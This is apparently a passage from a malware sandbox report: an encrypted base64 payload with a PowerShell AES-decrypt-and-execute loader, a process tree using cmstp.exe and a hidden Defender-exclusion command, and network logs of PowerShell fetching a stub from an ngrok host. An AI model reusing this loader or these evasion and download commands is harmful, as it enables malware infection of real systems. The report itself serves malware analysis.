9 A 0 9 5 W o N D 7 m w Z a Z l 8 D m 4 E y 9 + B a Q A N k 8 i M v F K 5 c 6 7 C + j V 7 7 U / + / J o N d F 5 n 5 + W 9 h 9 F S R f j J g M 3 t K O P 3 b C 4 5 F J z F Z C n 1 y c Q K j 4 7 S X T 9 4 Y D N b L W C e F I X V H s f R K K d C O A m L t q Y 8 q b C 9 r 1 1 P x 6 l I X 2 G / p B M f 4 E 3 x k D n t h p t b r G o u e M T j 0 d K 7 w i o P D V e C j t z x w l w x M 9 R L j n x 2 m k 0 T V R e 9 E o 0 x n T 0 7 p T A + P v F T W M S B U U B M B a b D + y A W b 3 T H D h s Y O V c Q Y k Q + 0 G R u a 2 p b 2 / O 8 D w s M + N e y J F / j j b z o e 0 f Q o o k l W b U m 7 5 O A n V c B z a k A / U e u v 7 Y Y D F O I d 5 U O b x N u 4 J k 0 q D c p T f 1 N 1 5 5 p z 7 o l g Y f c D i 6 2 D p J 3 T Y 6 V e Y J l J q 7 S U 7 y t c g 7 d M y d Q x h f p l d e Z Z J y q i F y x 7 Q U D y 2 d 9 R J P 7 6 + W / M a x m + T c S O u 5 5 J x x I a h g / 9 4 N + e o y n V I Y c D E n 2 y Z / w a e C X J I v t g Z Y Y 3 S 2 G m r t U k G E V P t 2 3 s w I 0 y F 4 v m m 4 m E H s P P / i z A g T F 2 D B o g b V N r R k P 8 O Y 5 5 y u 0 g E m 3 b n e z g a C 2 p c y 9 W x M E 4 n O H M 7 K T t U j s l c K 9 Z K j G s N + t Q v 6 Q p z V c 0 6 m w D B K S x X E T G w x 0 e I Y r R 0 H S A x x q o 3 9 J c J D x d h U 0 b z l v K y f h r 1 w m P 4 B J 0 5 d y O s O Q K L l S b + F + f R n A g F k h Z x G 5 p 0 X y g s 1 j 8 z C x C c p z W + e p E / Z 8 t m z f t r t K 2 4 f 7 r + 0 n V L X r J Q i q q H P w P G l D 9 r F I k l w 6 I G 1 U F N d E 6 E r 3 2 / K 7 Y k 3 U G U D x P 0 W g h G X B 6 1 m 7 Z s j U 6 w c f A V 9 c 7 X s O y r O N x g y F e b O Z 8 k H R R V Z M + Q n Z 7 s 2 b A x f 4 x B 7 b u H L d r M 5 k 9 W X 9 h 7 B K m 2 c 6 V z S U A H m A S A T G s 3 h 6 e / T + / G 7 8 8 9 r 7 R I 0 i L q 4 K z W S K R q f E Z V 2 L J n Q w Q f P P n i 7 J 8 J g v o u L V 7 / T V g P l E Q j 5 l / 3 y c L t v P D G 7 a j V 2 t Y n 1 l j p 1 V 2 A e N K I g a F z W g x A W z i / B X / 2 V X M Z H x I L u A n r 3 a + c X N A g C V x z f P m i v 4 h u V u R 9 P 3 F W 7 R H f q f M 9 C A z 3 0 Z y W p H p R g q 0 F P / A A 8 O S / O Q t 0 K w a s m r q J b I v 5 W x i Z w O o 2 7 5 i Y w B e f + 6 n H l j J M 1 2 v M 1 l D f L m d w f Z b 7 7 l 5 r C q k i g H 0 g M S l / V W I 1 5 N a I 6 v d N U + Z a a g P u R 7 o g M s x y 0 T m m l Q E A P Z W n g T a C b k Y j 6 M t K p o U b S j J H v c Q L d 7 i I + s 0 s h h h H 4 w O Z 2 a r Q 7 v z H i b a Z f S g B L z R s V Y K + V 6 A 0 S d N Y Y b t q S I P F D 5 A 9 Y W i p C u P X W 7 P W R d l w f u N 8 8 + U O N D T 4 R i M k m r K A d O N Y Z C x d a h a g U / o X K q p V I e z 8 s r A j v H G 4 Z F t w 8 g o q O H H 5 l L 7 N S y 6 T P W n 5 U 5 f 5 P d s M D Y D Z 7 u l 2 1 7 N a P H u P V o 2 V N v K c n J B / U G R r O A 1 Y F 9 h + J l U Q + j X H k F l N p U Y 2 r N I m 5 r c R A L I y 5 f n I X 2 r t 7 g v f T x Q 6 / N D 8 n i t Q q 9 Q p 8 B M w 8 h M 4 Q h q l r B t 8 P X P 7 C 8 6 W v h r J + E n O z h l 9 H z R Q D I J 7 O U K + z 7 5 t 7 m w 2 I t 8 w n o e / R r e j x K c g 0 f k 3 I C r W 4 O / w U J F F n 4 z y L x S K T K B W + H P H A U V O H Z G v q E I B n X I C Q s c j m / v x j Z n v I D n A 4 V N 5 c n 3 f 3 n J h N c 9 Q y B / 2 F U K l 4 Y Y F v h U V M + I k U Q 2 X 9 l V M 0 e k h 1 9 B B 0 g Z D 6 Z e + 4 C N f h v 9 V 4 T B 8 G 3 M j 3 5 8 S u f R 4 z a j 4 J A e O V 2 T b h A 6 T L Z K I I z D Q z V M W 4 1 f B f d v r g G v 4 U x C u U H Y Y h U F h h 4 4 w t E F y B b v p 2 D X I o M m 9 Z 2 l V M g H v g z e x t a i r F 5 n f l S g I Z k m x V U G 1 J 0 A B D B X U M F T l P j c J + F y 6 P n g T 8 O F Z j K k G q O E 0 x k 0 4 S K F 0 + Z n C S e O g M c / 5 t D W G t V 6 s p N O 5 K f T r V r X 6 u r Q e 5 5 B x c O r p W U D X T k + Q n 6 t X s x R N H + t l V q 0 a a / Y G j 3 L r h f g l d 3 Z 9 U h 8 r 7 f I D H L f E t k t F + S 9 f r i / c V c + U U q G A A F + S G w F 0 J n E s 8 d R 1 2 W b h N N P x Z u 7 B p k x s F l m N 6 V g m B 4 2 p b 8 k Z a o I Q t i I G T o I N w p d m w M b o n f K f 1 n J W F S p 9 f I k t Y b I T Z W j R 0 s D / h Y 3 h I F m N R V n 2 I i M O 7 t T l T e 4 e 9 J H f a q C d g K + z s 7 8 e n e 4 5 u W j R C k F Y d U K J j F e j F j X w z a 8 6 d d p P N M J O V r i C f H w F T D q R i 0 R A b Y h X J c A 0 N o Z G e F D h k L q T P 3 Z B 0 k t a V F H k 1 4 w v 5 F E K H 8 p q H T 9 b 8 T 2 D v y D S 1 d l U m K f b W Q E g L a 3 7 8 4 2 6 y T D Q t l M f U m + 1 A m h Z C P d D n + v O H h O S X B W X 3 q r s 2 9 R P C / O j / Y G x g 9 / S d 5 7 3 F R 2 R t j A z s j 4 3 g c m d N 8 V b E 0 d 4 + q x Q d i w A P n a v G 1 k f U k 0 b b 7 F v a c c I U Y t 8 z n 1 L n O p P y L G a h P Q E n C n 1 b 5 q r g g L s x A j C w h + B 0 1 K O K + D a b W 4 T 8 V f a C v S S V P 4 h y U h 8 F M L 9 V L Q g d P V 9 Y + s f K s C f 7 3 N R / 1 + a N J n Q D H N y 4 p i v d A Y L i g 9 w s 4 i E R i L X / S z k c Y 8 g b 6 f U C p m m x E J o N x T 1 p V 5 4 s 3 R s m j b 6 V R C Y d E T w J j X 7 Z O q y A v x N M j q Y j M u z x k T / m 8 5 S s l m Z x q d T n z 1 Y M X 4 Q n p E Z X F j R 7 o P T X / u r a G C m Q Z Y K z 6 O I i t F 0 p q O T b O Z 3 7 7 I S O Y x J U p t b y w c T 4 6 7 1 K B g 2 E D X q I w / k u B Z 5 A R V w 0 D a q U n s Y j E 8 Y n v j p X z r V X H K d y + O M 5 y v 8 K K j a k O 7 G 9 c Q r v S g 9 G N b Y s K X 1 d s K z A I o 2 U r z e z C x d w B e R + A m q P + X m D Y u 4 1 e l j a X h t i 4 F W N r u U F 2 c + U k T C X p f M q K d Z M P L Z b u M N R 5 a 7 H k y g b X 5 K 8 + j 6 X E / 8 0 5 X 4 A 4 3 X N B Z 8 O 8 H g w O s + S N A w 6 0 B N 2 I g B Q u t A J i D U d F 2 6 z J o b u B T l f q 1 I j M J Q A O g r e h k C 5 s y G f P D J 8 / N F 6 B 3 x 2 H a N n U E L H J h 7 x j M k g a c B J S x + y D s o Y p 3 V h c l J 0 L 6 r X r x g t M a z n n v + A 6 4 X L s q y o / O a Y F c + p C Q U 1 p S Z W o A A E Y g m o r e 7 g U f a s B i l 1 Z K G w g Q V C i Q h W B M t I m P d 0 o U K l V k e N A b o u Y J q 0 Q e u n N c d P u E 6 f v H a a J D 0 l G W y w x V B 4 D 1 J G 8 0 V x k + T R c N 3 h z N D c 1 p / i Q d U H o w g G j j v J 5 8 d R g X 0 d C Y Y P q j m 7 C V v 6 q h l f g c v i M B x T Z 3 z 8 n / q T 1 g q 8 c e g F d b / j 2 b I 3 W 0 M x b 5 4 n k t v r A o 9 q K J + i 4 E b 1 o T 4 e 4 o 0 N J m v 3 Y k u E N m W i 0 T U J 3 5 p E W 1 8 P L o j b z 3 Z / a Z t L X m B W g z T v a d u l w z U u u N w M N a p x 6 n N y b O x N Y X 4 i 6 H P 9 y a c q p V + h W l c l W r / i B Z w p 7 m G Q F q Z h 3 g S n b / h s u Q O C 9 u d F K 1 E K B G Q t N Y y y R H F o G 3 k 3 F l 7 D r S l 6 9 g O l h F m K V o f d e + g Q 0 K s L R U / L R 9 E m V C T 0 v Q 5 s n k Y t y T A 6 / Q w O U = " )  
         $ i   =   $ d [ 0 . . 1 5 ]  
         $ e   =   $ d [ 1 6 . . ( $ d . L e n g t h   -   1 ) ]  
         $ a e s   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d  
         $ a e s . M o d e   =   [ S y s t e m . S e c u r i t y . C r y p t o g r a p h y . C i p h e r M o d e ] : : C B C  
         $ a e s . K e y   =   $ a  
         $ a e s . I V   =   $ i  
         $ d e c   =   $ a e s . C r e a t e D e c r y p t o r ( )  
         $ o u t   =   $ d e c . T r a n s f o r m F i n a l B l o c k ( $ e ,   0 ,   $ e . L e n g t h )  
         $ r e s   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ o u t )  
         I n v o k e - E x p r e s s i o n   $ r e s  
  -inputFormat xml -outputFormat text
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ghxwalv4\ghxwalv4.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:600
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E2B.tmp" "c:\Users\Admin\AppData\Local\Temp\ghxwalv4\CSC25F5039DC5284001B44FF5D341B366.TMP"
            5⤵
              PID:4660
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\5peqrxtl.inf
            4⤵
              PID:5052
          • C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
            "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:4164
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1488
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1748
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:2620
        • C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
          "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3364

        Network

        • flag-us
          DNS
          241.150.49.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.150.49.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          224.122.19.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          224.122.19.2.in-addr.arpa
          IN PTR
          Response
          224.122.19.2.in-addr.arpa
          IN PTR
          a2-19-122-224deploystaticakamaitechnologiescom
        • flag-us
          DNS
          64.159.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          64.159.190.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          43.58.199.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          43.58.199.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          104.219.191.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          104.219.191.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          53.210.109.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          53.210.109.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          171.39.242.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          171.39.242.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          110.11.19.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          110.11.19.2.in-addr.arpa
          IN PTR
          Response
          110.11.19.2.in-addr.arpa
          IN PTR
          a2-19-11-110deploystaticakamaitechnologiescom
        • flag-us
          DNS
          26.35.223.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          26.35.223.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          empty.ngrok.io
          powershell.exe
          Remote address:
          8.8.8.8:53
          Request
          empty.ngrok.io
          IN A
          Response
          empty.ngrok.io
          IN A
          18.192.31.165
          empty.ngrok.io
          IN A
          3.125.223.134
          empty.ngrok.io
          IN A
          3.125.102.39
          empty.ngrok.io
          IN A
          18.158.249.75
          empty.ngrok.io
          IN A
          3.125.209.94
          empty.ngrok.io
          IN A
          3.124.142.205
        • flag-de
          GET
          https://empty.ngrok.io/stub.txt
          powershell.exe
          Remote address:
          18.192.31.165:443
          Request
          GET /stub.txt HTTP/1.1
          Authorization: your_fixed_token_here
          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
          Host: empty.ngrok.io
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Cache-Control: no-cache
          Content-Disposition: inline; filename=stub.txt
          Content-Length: 10467
          Content-Type: text/plain; charset=utf-8
          Date: Mon, 04 Nov 2024 20:35:19 GMT
          Etag: "1730477183.4482946-10467-3937406383"
          Last-Modified: Fri, 01 Nov 2024 16:06:23 GMT
          Server: waitress
        • flag-us
          DNS
          165.31.192.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          165.31.192.18.in-addr.arpa
          IN PTR
          Response
          165.31.192.18.in-addr.arpa
          IN PTR
          ec2-18-192-31-165 eu-central-1compute amazonawscom
        • flag-us
          DNS
          205.122.19.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          205.122.19.2.in-addr.arpa
          IN PTR
          Response
          205.122.19.2.in-addr.arpa
          IN PTR
          a2-19-122-205deploystaticakamaitechnologiescom
        • flag-us
          DNS
          tse1.mm.bing.net
          Remote address:
          8.8.8.8:53
          Request
          tse1.mm.bing.net
          IN A
          Response
          tse1.mm.bing.net
          IN CNAME
          mm-mm.bing.net.trafficmanager.net
          mm-mm.bing.net.trafficmanager.net
          IN CNAME
          ax-0001.ax-msedge.net
          ax-0001.ax-msedge.net
          IN A
          150.171.27.10
          ax-0001.ax-msedge.net
          IN A
          150.171.28.10
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239360264291_1OMXAE3VFGJI9A76K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239360264291_1OMXAE3VFGJI9A76K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 604205
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 2D58C73D95D04C7F86FB20BE3C170192 Ref B: LON601060103025 Ref C: 2024-11-04T20:35:42Z
          date: Mon, 04 Nov 2024 20:35:42 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239360264303_1FV8HLP8B8WOIRSCV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239360264303_1FV8HLP8B8WOIRSCV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 461387
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: ECC21F5A701F4681A0AECF9FD2C033A7 Ref B: LON601060103025 Ref C: 2024-11-04T20:35:42Z
          date: Mon, 04 Nov 2024 20:35:42 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239340418579_1UMXSJ3YHHNUEPPRM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239340418579_1UMXSJ3YHHNUEPPRM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 585223
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 019B625A87E34C2DB76D6621AD5FCCCB Ref B: LON601060103025 Ref C: 2024-11-04T20:35:42Z
          date: Mon, 04 Nov 2024 20:35:42 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239317300915_11PL293NENO2DA53I&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239317300915_11PL293NENO2DA53I&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 401499
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: BBBC2A3CB0CC4CD88A6DDC23459969BD Ref B: LON601060103025 Ref C: 2024-11-04T20:35:42Z
          date: Mon, 04 Nov 2024 20:35:42 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239340418580_1XZDKNXCHEXKE96NH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239340418580_1XZDKNXCHEXKE96NH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 666447
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 2C43E47157F9481D847E5CA0703DAC1F Ref B: LON601060103025 Ref C: 2024-11-04T20:35:42Z
          date: Mon, 04 Nov 2024 20:35:42 GMT
        • flag-us
          GET
          https://tse1.mm.bing.net/th?id=OADD2.10239317301348_1IGED3LPK164UYK70&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          Remote address:
          150.171.27.10:443
          Request
          GET /th?id=OADD2.10239317301348_1IGED3LPK164UYK70&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
          host: tse1.mm.bing.net
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-length: 531680
          content-type: image/jpeg
          x-cache: TCP_HIT
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 34796DD9AED54333A2F69847439B3710 Ref B: LON601060103025 Ref C: 2024-11-04T20:35:43Z
          date: Mon, 04 Nov 2024 20:35:43 GMT
        • flag-us
          DNS
          14.227.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          14.227.111.52.in-addr.arpa
          IN PTR
          Response
        • 18.192.31.165:443
          https://empty.ngrok.io/stub.txt
          tls, http
          powershell.exe
          1.1kB
          14.0kB
          13
          16

          HTTP Request

          GET https://empty.ngrok.io/stub.txt

          HTTP Response

          200
        • 127.0.0.1:2024
          RegAsm.exe
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
          6.9kB
          15
          13
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
          6.9kB
          15
          13
        • 150.171.27.10:443
          https://tse1.mm.bing.net/th?id=OADD2.10239317301348_1IGED3LPK164UYK70&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
          tls, http2
          115.7kB
          3.4MB
          2445
          2439

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239360264291_1OMXAE3VFGJI9A76K&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239360264303_1FV8HLP8B8WOIRSCV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418579_1UMXSJ3YHHNUEPPRM&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239317300915_11PL293NENO2DA53I&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239340418580_1XZDKNXCHEXKE96NH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Request

          GET https://tse1.mm.bing.net/th?id=OADD2.10239317301348_1IGED3LPK164UYK70&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

          HTTP Response

          200
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
          6.9kB
          15
          13
        • 150.171.27.10:443
          tse1.mm.bing.net
          tls, http2
          1.2kB
          6.9kB
          15
          13
        • 127.0.0.1:2024
          RegAsm.exe
        • 127.0.0.1:2024
          RegAsm.exe
        • 127.0.0.1:2024
          RegAsm.exe
        • 127.0.0.1:2024
          RegAsm.exe
        • 8.8.8.8:53
          241.150.49.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          241.150.49.20.in-addr.arpa

        • 8.8.8.8:53
          224.122.19.2.in-addr.arpa
          dns
          71 B
          135 B
          1
          1

          DNS Request

          224.122.19.2.in-addr.arpa

        • 8.8.8.8:53
          64.159.190.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          64.159.190.20.in-addr.arpa

        • 8.8.8.8:53
          95.221.229.192.in-addr.arpa
          dns
          73 B
          144 B
          1
          1

          DNS Request

          95.221.229.192.in-addr.arpa

        • 8.8.8.8:53
          43.58.199.20.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          43.58.199.20.in-addr.arpa

        • 8.8.8.8:53
          104.219.191.52.in-addr.arpa
          dns
          73 B
          147 B
          1
          1

          DNS Request

          104.219.191.52.in-addr.arpa

        • 8.8.8.8:53
          53.210.109.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          53.210.109.20.in-addr.arpa

        • 8.8.8.8:53
          171.39.242.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          171.39.242.20.in-addr.arpa

        • 8.8.8.8:53
          110.11.19.2.in-addr.arpa
          dns
          70 B
          133 B
          1
          1

          DNS Request

          110.11.19.2.in-addr.arpa

